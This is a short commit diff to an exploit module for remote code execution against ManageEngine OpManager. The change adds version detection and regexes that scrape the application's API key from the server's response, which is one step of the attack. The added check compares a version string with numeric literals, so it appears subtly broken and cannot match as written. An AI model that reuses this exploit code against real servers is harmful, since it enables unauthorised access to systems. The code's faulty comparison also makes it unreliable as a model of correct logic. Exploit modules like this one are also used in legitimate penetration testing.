version check, as the name for the api key call changes on 11.0. Line 130

Sara Perez · Sara Perez · commit 178d68003eba · 2017-04-18T10:32:28.000+01:00
diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -121,8 +121,14 @@ def exploit
       'uri' => redirect,
       'method' => 'GET'
     })
+    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
+      version = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Could not gather the version in use")
+    end
 
-    if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
+    if res && res.code == 200 && ((version == 11.6 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/) || (version == 11.0 && res.body =~ /window.apiKey = "([a-z0-9]+)"/))
+      # the line above checks for the version, as for version 11.0 the call for the api key value is different but the rest of the exploit works the same.
       api_key = $1
       print_status("Retrieved API key [ #{api_key} ]")
     else
